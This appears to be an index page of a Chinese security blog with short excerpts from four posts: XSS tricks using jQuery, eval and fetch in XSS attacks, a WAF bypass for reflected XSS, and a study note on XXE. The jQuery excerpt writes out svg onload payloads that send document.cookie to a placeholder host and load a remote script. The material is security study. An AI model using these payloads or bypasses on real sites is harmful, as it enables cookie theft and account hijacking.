13
2018
12

XSS : 围绕 jQuery Libary 的一些跨站知识点 [补充ing]

当前jQuery版本:v 3.3.1知识点:`//`缺省协议,该协议可以精简payload,或绕过黑名单策略`$.get`方法,发起一个get请求,比如<svg onload="$.get('//127.0.0.1/xss.html',document.cookie)">`$.getScript`方法,远程调用一个js脚本,比如<svg onload="$.getScript('//127.0.0.1/xss.js'
17
2018
10

XSS小记:Javascript 中 eval 与 fetch组合在攻击场景中的使用

         进入正题之前先说说个人理解的进行反射XSS攻击时XSS Platform所起的作用,攻击者构造payload 致使被攻击者访问恶意URL时页面通过script src 的方式引用了XSS Platform上的一个恶意JS文件,该文件的大致内容就是将本地的cookies发送到XSS Platform。         有次
12
2018
04

XSS小记:记一次绕过知道创宇加速乐实现反射XSS的payload

测试网站XSS,时常会碰到搜索框未过滤敏感字符导致反射XSS,大致描述一下漏洞场景:

      1.搜索框的关键词被带入到 URL和页面中

      2.敏感字符(引号/尖括号)完全没有过滤,各种html标签,js事件完全不检测

03
2018
04

XML之Javascript DOM复习以及XXE漏洞的理解

        今天想学习一下XEE(xml实体注入)漏洞,所以先学习了一下xml语法,在菜鸟教程上看了会资料,对xml的一些总结如下:xml 相比 html,前者的作用是存储数据,后者的作用是显示数据;一个xml文档须有根元素(相对其他元素,该元素为父元素);通过Javascript脚本可以通过xml文件获得 XML Document对象来获取xml文件里的数据.     &